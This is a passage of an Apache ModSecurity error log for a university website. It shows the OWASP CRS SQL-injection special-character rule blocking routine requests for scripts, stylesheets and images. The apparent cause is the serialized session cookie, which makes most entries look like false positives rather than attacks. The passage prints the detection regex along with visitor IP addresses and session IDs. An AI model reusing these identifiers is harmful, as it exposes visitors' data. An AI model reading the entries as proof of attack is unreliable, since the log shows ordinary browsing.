"/resources/common-web/js/ddsmoothmenu.settings.js"] [unique_id "ZOzR88Co-f0AANpfcX8AAAAF"]
[Mon Aug 28 23:57:23.271647 2023] [:error] [pid 55903] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.settings.js"] [unique_id "ZOzR88Co-f0AANpfcYAAAAAF"]
[Mon Aug 28 23:57:23.289183 2023] [:error] [pid 55903] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/common-web/js/styleswitch.js"] [unique_id "ZOzR88Co-f0AANpfcYEAAAAF"]
[Mon Aug 28 23:57:23.320112 2023] [:error] [pid 55903] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/js/ext_plugins/statusbar/css/statusbar.css"] [unique_id "ZOzR88Co-f0AANpfcYIAAAAF"]
[Mon Aug 28 23:57:23.321340 2023] [:error] [pid 55747] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/img/icons/silk.css"] [unique_id "ZOzR88Co-f0AANnDyQsAAAAD"]
[Mon Aug 28 23:57:23.369377 2023] [:error] [pid 55747] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/application/frontend/find_m.js"] [unique_id "ZOzR88Co-f0AANnDyQwAAAAD"]
[Mon Aug 28 23:57:23.369432 2023] [:error] [pid 55903] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/index.php/c_mastah/grid_vstsemester"] [unique_id "ZOzR88Co-f0AANpfcYMAAAAF"]
[Mon Aug 28 23:57:23.418179 2023] [:error] [pid 55903] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/common-web/gfx/theme1/buttons/li2.gif"] [unique_id "ZOzR88Co-f0AANpfcYQAAAAF"]
[Mon Aug 28 23:57:23.748403 2023] [:error] [pid 55903] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOzR88Co-f0AANpfcYUAAAAF"]
[Mon Aug 28 23:57:37.663096 2023] [:error] [pid 55903] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOzSAcCo-f0AANpfcYcAAAAF"]
[Mon Aug 28 23:57:37.666371 2023] [:error] [pid 55794] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOzSAcCo-f0AANny2WEAAAAO"]
[Mon Aug 28 23:57:37.909222 2023] [:error] [pid 55749] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOzSAcCo-f0AANnF9bAAAAAE"]
[Mon Aug 28 23:57:37.909471 2023] [:error] [pid 55910] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOzSAcCo-f0AANpm5qYAAAAX"]
[Mon Aug 28 23:57:37.919977 2023] [:error] [pid 55794] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOzSAcCo-f0AANny2WIAAAAO"]
[Mon Aug 28 23:57:37.922569 2023] [:error] [pid 55916] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOzSAcCo-f0AANpsPIMAAAAf"]
[Mon Aug 28 23:57:37.924539 2023] [:error] [pid 55903] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOzSAcCo-f0AANpfcYgAAAAF"]
[Mon Aug 28 23:57:37.930089 2023] [:error] [pid 55912] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOzSAcCo-f0AANpo-78AAAAb"]
[Mon Aug 28 23:57:38.158647 2023] [:error] [pid 55910] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOzSAsCo-f0AANpm5qcAAAAX"]
[Mon Aug 28 23:57:38.161119 2023] [:error] [pid 55749] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOzSAsCo-f0AANnF9bEAAAAE"]
[Mon Aug 28 23:57:38.174572 2023] [:error] [pid 55794] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOzSAsCo-f0AANny2WMAAAAO"]
